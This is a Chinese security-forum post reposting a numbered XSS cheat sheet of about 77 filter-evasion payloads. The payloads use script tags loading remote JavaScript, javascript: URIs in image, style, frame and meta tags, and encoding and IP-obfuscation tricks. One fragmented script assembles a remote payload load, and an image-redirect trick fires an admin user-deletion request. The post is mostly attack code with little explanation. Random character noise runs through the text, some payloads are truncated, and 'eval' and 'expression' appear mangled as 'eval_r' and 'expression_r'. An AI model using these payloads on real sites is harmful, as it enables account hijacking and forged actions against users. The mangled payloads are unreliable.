貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。3 m4 C8 h' P5 {7 f1 g" c
(1)普通的XSS JavaScript注入# K# N h- Z/ s7 J4 j1 v& {
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 K" x3 C' H' i" _+ m ]+ z4 x(2)IMG标签XSS使用JavaScript命令
, e( D" d- [+ }/ w! m2 h<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' o8 l3 Y- [# |" I$ `(3)IMG标签无分号无引号
" W. Z" z; }. B: W/ C<IMG SRC=javascript:alert(‘XSS’)>0 X: x2 A) S* F& s! a7 s$ A: d
(4)IMG标签大小写不敏感
! V+ N- } I8 j b<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
/ ]" n( I) M- w1 c8 F(5)HTML编码(必须有分号)
; W0 r( X) h; y- K0 O/ i C<IMG SRC=javascript:alert(“XSS”)>
5 p$ {8 X# f! a* L4 A(6)修正缺陷IMG标签4 W! L9 e @7 s( Q1 a
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
, B4 V g: e0 D6 |$ J& ~
' M. r; P5 D. c, c& {4 ]) A3 y% ~* I, z) O( j& R
(7)formCharCode标签(计算器)4 z- ]+ n9 G; v- `9 ~- W6 I: T/ R; u
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2 e* b+ D2 E1 H0 |4 Y5 K(8)UTF-8的Unicode编码(计算器)5 O) ]! f, M0 }) _- f
<IMG SRC=jav..省略..S')>; B: u+ s1 u$ u" I% u" I$ r
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)9 y2 P3 F; b F' U$ k
<IMG SRC=jav..省略..S')>! d7 S7 A5 I5 M4 s/ H9 B* f
(10)十六进制编码也是没有分号(计算器). U. w- C- L$ U, _
<IMG SRC=java..省略..XSS')>
: A& H( ^& u" s/ S6 f(11)嵌入式标签,将Javascript分开
/ w9 B+ y- [2 B* z% f6 j/ `<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 \1 s$ H& b% X2 Z! Y0 \: D(12)嵌入式编码标签,将Javascript分开& N u6 W; v- s6 K9 z
<IMG SRC=”jav ascript:alert(‘XSS’);”>
2 ~4 E* L) K# i' z* }(13)嵌入式换行符! x; r& f d* N! |" y# u0 ]
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 T% @( I' P4 d' e(14)嵌入式回车
8 p, J* g+ v3 g( t3 c, K<IMG SRC=”jav ascript:alert(‘XSS’);”>
! | I4 G( M" z# J% u. D(15)嵌入式多行注入JavaScript,这是XSS极端的例子. ~" D+ A D7 C
<IMG SRC=”javascript:alert(‘XSS‘)”>
9 e7 B+ h- H0 y' \: V(16)解决限制字符(要求同页面)
+ A; `( X, d$ @4 `% U<script>z=’document.’</script>
$ {6 f8 P* T1 d" p<script>z=z+’write(“‘</script>9 X0 l( v9 z+ O }- X- d
<script>z=z+’<script’</script>/ {/ }+ d7 J U% B5 J3 Y$ d6 y7 l
<script>z=z+’ src=ht’</script>
8 w G. c) k' i. i2 F# f3 j<script>z=z+’tp://ww’</script>
( V( d# g. k6 {$ i! S0 h* f! j<script>z=z+’w.shell’</script> D6 V! ?( J6 Y0 l
<script>z=z+’.net/1.’</script>
4 I0 p; }0 {/ C& @. z2 j<script>z=z+’js></sc’</script>
y8 ?, q$ ^$ n7 j1 R<script>z=z+’ript>”)’</script>/ o- H6 P5 b' N6 \6 C1 L
<script>eval_r(z)</script>
/ t% w" \' [2 s% Q; i/ t(17)空字符12-7-1 T00LS - Powered by Discuz! Board
& R4 x9 {2 p* R1 Hhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
. t1 O: ]0 e6 n+ {6 o- q& u% n8 xperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
5 M2 N# g) m" ^9 J4 K h(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用3 _4 M) O9 r% m4 Z+ P) h: S4 A
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
+ E! ]8 v2 \6 Y8 n) ](19)Spaces和meta前的IMG标签5 P o8 s( U! `: R1 N
<IMG SRC=” javascript:alert(‘XSS’);”>6 z0 k6 S) o% a
(20)Non-alpha-non-digit XSS
6 [/ Y2 `# j- w% L( T0 S1 _<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>9 w; C O- m d+ }- y
(21)Non-alpha-non-digit XSS to 25 S" u" |. ?$ F7 A5 d5 j" r
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
o. d6 l7 u8 t0 R) t: h$ B$ u(22)Non-alpha-non-digit XSS to 3' a3 X1 u3 E: S; i8 K l# e% w
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>/ F# F4 f# _0 m' {/ F
(23)双开括号* m& r/ D. a$ K3 O3 ^) ]
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
- x1 \- \, C Z(24)无结束脚本标记(仅火狐等浏览器)
, q7 _; `( B8 s& b<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>/ v8 E' G$ G! z- B+ c) e. e
(25)无结束脚本标记29 r. o7 `3 Z' i; g6 {2 a! l! @
<SCRIPT SRC=//3w.org/XSS/xss.js>5 H t4 u K3 E& K3 P
(26)半开的HTML/JavaScript XSS
# _8 ]4 {/ K, g$ t: F, e$ ?<IMG SRC=”javascript:alert(‘XSS’)”
0 i. g' O& d' P& f. n: @: `3 U(27)双开角括号( E, |( s' J) p7 J6 W+ i! ]
<iframe src=http://3w.org/XSS.html <* c: F1 x. ^0 f/ k
(28)无单引号 双引号 分号
& P( R- ~' {& f7 j<SCRIPT>a=/XSS/2 ~" v m( Q0 V+ Q
alert(a.source)</SCRIPT> p P: j, D' @4 x: \' H3 b
(29)换码过滤的JavaScript
0 z1 V! I6 B$ w o\”;alert(‘XSS’);//
' w0 k7 N# c8 ?' H/ F& U(30)结束Title标签' D. o9 {5 u' K; L2 s
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>& Q: g$ n, X. K" y2 a8 ^5 s
(31)Input Image
2 d2 @( P( A, t; }<INPUT SRC=”javascript:alert(‘XSS’);”>
3 ]: [0 z1 _" k# H: r, U(32)BODY Image& f8 J0 O X+ W* N, W* I3 r2 C6 S
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>$ L# E( c% f# }: n( j2 S7 j
(33)BODY标签3 c; R( I6 X' X3 R* n' |
<BODY(‘XSS’)>; K ?& _9 g9 U6 A4 c/ d
(34)IMG Dynsrc' l& a! G( g) L: E W7 u
<IMG DYNSRC=”javascript:alert(‘XSS’)”>+ J4 I2 |# C: ?& D, g% E, H; W
(35)IMG Lowsrc
( i; v! I4 \6 e' k<IMG LOWSRC=”javascript:alert(‘XSS’)”>
* K l6 R. n9 e) Q' b# w5 b(36)BGSOUND
* t5 V# l. o8 f4 L0 m% H<BGSOUND SRC=”javascript:alert(‘XSS’);”>
! d% m1 A. E% H, I9 g# i0 o1 P(37)STYLE sheet& `; S9 \6 `5 T, L% E2 z1 Y
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>- \0 [7 K. U8 f* v, S: E4 T
(38)远程样式表- Q% m/ U0 A3 o( c3 K7 J4 m* i
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>( Q$ E( d5 C k8 c5 S4 T. E5 X
(39)List-style-image(列表式)
# J3 n1 [$ k( ^0 u7 N<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS' A/ ]8 ]$ s& G
(40)IMG VBscript
* H0 _% z" v' s<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
( K& e/ {9 Q# K+ z/ |(41)META链接url
7 C% Z3 p; }& N/ U; ?0 y& X4 k& U0 ]5 Y6 W }4 n1 P2 g! {. I0 e
- s6 j7 n1 \( T+ h! M
<META HTTP-EQUIV=”refresh” CONTENT=”0;7 U, g& w) ~: ~; ~" [
URL=http://;URL=javascript:alert(‘XSS’);”>9 f) }4 I* A. o
(42)Iframe
" J/ I; X& |, O# Z( y6 K<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
0 M3 `3 o; Y+ i9 ~1 E(43)Frame
* V% W5 Y; |5 r% Q+ Q- ?<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board% v. j% o7 i. O8 v$ c
https://www.t00ls.net/viewthread ... table&tid=15267 3/6: L3 a D3 q( s/ r% z8 u! _( p; T* S3 N
(44)Table
$ m5 j' ?/ N* y# d3 P<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
7 Y6 u& @( {+ ?5 {% R(45)TD
@8 g7 F( \- v$ \2 Z2 r<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”> h! C6 j8 j$ ]: ?7 b
(46)DIV background-image# |9 P$ L7 \; x# q) T+ F
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>' i. l9 R% R& C7 i
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
+ q- u+ f0 [, {3 @8&13&12288&65279)2 [$ d& G+ k! e+ F" V7 P3 Z9 J+ `% P
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>' ]9 N, H: s2 D
(48)DIV expression. Y! f/ N1 \! r8 b' u) _; B/ Y# n
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
" X+ k+ Z7 u; a* u2 V1 A. A$ X, S(49)STYLE属性分拆表达0 E: i( x' r7 i2 r0 l5 E
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”> o8 a0 g& u; h' _
(50)匿名STYLE(组成:开角号和一个字母开头)5 c8 h3 `4 D9 u
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>. o: b' }/ n9 t' r5 X
(51)STYLE background-image" P R. u# X: P" f4 ^
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
w, M ~' l5 i$ V) CCLASS=XSS></A>! z Z) ^, Q6 C8 g. ]
(52)IMG STYLE方式. L9 R b/ v6 V4 r* A. y
exppression(alert(“XSS”))’>5 `" w9 H. h/ z& k* W; n" X" B
(53)STYLE background6 f; E, h2 Z" w. N( L7 \! {+ A0 |( h
<STYLE><STYLE
/ A [8 a1 A! S. a7 v9 w1 Ptype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>) v4 r q3 i. h0 t! z3 x5 F, f9 S) B
(54)BASE
2 O u+ z. q; Z' l; a3 Z. B6 a<BASE HREF=”javascript:alert(‘XSS’);//”>: T' h @& a) O3 e
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
% X+ ^9 D5 Z% I<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
2 u3 A- X! j; ^+ b3 d! v( [(56)在flash中使用ActionScrpt可以混进你XSS的代码* E- |( h- O- i4 ^& Z+ V& f/ q
a=”get”;& N E# ^, o( z8 m+ R
b=”URL(\”";
" X5 v% o f; T1 W! Ac=”javascript:”;( L+ ~+ h' p9 Z K" W6 B
d=”alert(‘XSS’);\”)”;. K f8 M; H! L! x2 m3 r
eval_r(a+b+c+d);
- j& h: G& e( c* Q! f; r F(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
" P; G2 ^+ i4 l( S<HTML xmlns:xss>6 ~5 k- e; u; A% P# u" V
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
# ` t* j1 C+ I<xss:xss>XSS</xss:xss>
% p# v8 E/ Y* x7 i, c8 v2 u+ A</HTML>) Q- ^8 y5 ?+ d L. P
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用' u1 m1 n9 \" ]
<SCRIPT SRC=””></SCRIPT>, @. Z8 ?# n c' p
(59)IMG嵌入式命令,可执行任意命令+ @; A$ C- }+ P* i: x# l c
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
! T0 X) r! k+ l0 j' w z/ q2 l5 l(60)IMG嵌入式命令(a.jpg在同服务器)$ r$ v! z+ j6 k. F% V
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
4 k. U- K U$ I, u# o(61)绕符号过滤
: W& ~0 x l- H8 O7 m) M, |( R- E<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>& t3 x5 L- k( V' Q) e, I! R
(62): \7 }) {" G; |
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
& ?! U& T% N8 _5 G(63)
/ p8 V7 `& H6 c3 l<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>: W, ^! O, G# _/ ]3 ?! i; o
(64)7 a! G: F6 g% B* A0 H3 O6 R0 i. u7 b
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>4 d1 j, E( o! M. R" b# O( _
(65)
3 i; e& E" X; \6 V5 ?<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>8 o+ r& _/ w* J' I
(66)12-7-1 T00LS - Powered by Discuz! Board
& b9 L! U+ b( D$ Ahttps://www.t00ls.net/viewthread ... table&tid=15267 4/6, R1 i8 k0 g! `7 O* X" I
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>- o0 f) @7 {5 }) ]4 j
(67)& b, B+ s* b. g- H' X
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>/ H7 H7 a* N; N o+ u: C
</SCRIPT>, Z1 F- E$ c7 E, A. z& g/ D
(68)URL绕行
, R4 e1 A% `; y7 Q3 Z- x& \$ [<A HREF=”http://127.0.0.1/”>XSS</A> D6 c [5 ~; ?& B
(69)URL编码
- a4 q; f1 w; D$ X+ y1 I<A HREF=”http://3w.org”>XSS</A>
6 n$ T1 A' M3 q7 L8 M(70)IP十进制7 F- {; C! q y; W# f) a6 p* g
<A HREF=”http://3232235521″>XSS</A>8 ^0 H- @; j' }9 R3 b; m
(71)IP十六进制/ ^$ Z3 A8 Q, s( x" @0 z/ p0 M
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
: s( I2 f% s# T6 _6 H$ {& ](72)IP八进制
x! b& a1 @/ \7 i3 n<A HREF=”http://0300.0250.0000.0001″>XSS</A>% A. a/ ^( _& d2 s4 c* r
(73)混合编码
4 C$ K7 ~/ U. N: A' n6 z1 ]<A HREF=”h
; ~2 ?' z3 a. [' e0 v( P+ {. ]% wtt p://6 6.000146.0×7.147/”">XSS</A>+ t0 b! m7 M7 z& H, X& ~
(74)节省[http:]* u8 P' k" j; T* M! d, Z" D8 j
<A HREF=”//www.google.com/”>XSS</A>
" \1 N; g- f$ s(75)节省[www], ]" F; I6 m6 [. a, f. }$ V; \: `6 H
<A HREF=”http://google.com/”>XSS</A>/ m% I! p3 c/ S# I# q! S( H0 H% r
(76)绝对点绝对DNS3 u5 |* C9 @2 v5 {1 @+ `8 U3 o1 \
<A HREF=”http://www.google.com./”>XSS</A>
8 Z8 U+ H& Z! ?3 q$ A' X(77)javascript链接
o9 x$ |( y9 G+ L( Q/ ~<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>9 N$ E( [ b. \* |# @
) i0 d* e, |& M6 G6 O/ @9 e/ c7 Q
原文地址:http://fuzzexp.org/u/0day/?p=14
! X5 A; i% i0 }/ _; k' @5 P) P, ], q1 L$ K* `2 X
|